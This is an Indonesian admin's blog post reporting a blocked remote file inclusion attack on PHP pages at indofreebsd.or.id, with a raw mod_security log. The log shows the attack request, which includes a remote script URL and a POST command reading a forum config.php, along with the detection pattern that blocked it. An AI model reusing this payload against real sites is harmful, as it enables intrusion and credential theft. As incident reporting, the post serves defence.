Beberapa bulan yang lalu ada celah di website tetangga yang sama sama di hosting di server indofreebsd.or.id celah nya pada aplikasi web nya yaitu pada php pages nya dengan memanfaatkan syntax allow_url_fopen
Request: www.xxxxx.com 125.164.201.182 - - [01/Jun/2007:14:22:10 +0700] "POST /?page=http://geocities.com/ph41jo/debu.tx
t? HTTP/1.0" 403 273 "http://www.xxxxx.com/?page=http://geocities.com/ph41jo/debu.txt?" "Mozilla/4.0 (compatible; MSIE 5
.0; Windows 98)" Rl-JIsCoZM0AAAjyOmI "-"
----------------------------------------
POST /?page=http://geocities.com/ph41jo/debu.txt? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: in
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
Host: www.xxxx.com
Pragma: no-cache
Referer: http://www.xxxxxx.com/?page=http://geocities.com/ph41jo/debu.txt?
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "cat\\x20" at POST_PAYLOAD [severity "EMERGENCY"]
63
cmd=cat+%2Fusr%2Fhome%2Fdani%2Findofreebsd%2Fforum%2Fconfig.php
HTTP/1.1 403 Forbidden
Connection: close
Content-Type: text/html; charset=iso-8859-1
pada saat terjadi attack ini load httpd cukup tinggi dan memberatkan mesin , dan membuang buang bandwidth percuma. Saya ucapkan terimakasih kepada yang sekali lagi mencoba attack indofreebsd.or.id dengan berbagai cara dan semakin terbukti indofreebsd.or.id sangat menarik :)
| < Prev | Next > |
|---|



Comments